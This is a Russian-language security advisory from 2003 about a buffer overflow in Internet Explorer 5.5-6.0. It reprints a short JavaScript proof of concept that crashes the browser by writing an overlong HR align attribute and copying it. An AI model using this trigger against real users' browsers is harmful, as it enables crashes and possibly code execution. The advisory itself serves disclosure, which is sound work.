Переполнение буфера в Microsoft Internet Explorer
| Дата публикации: | 24.06.2003 |
| Всего просмотров: | 1349 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Переполнение буфера обнаружено в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу IE и возможно выполнить произвольный код на системе.
Как сообщает Digital Scream, следующий код приведет к аварийному завершению работы IE:
<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0
|
| Ссылки: | Internet Explorer >=5.0 : Buffer overflow |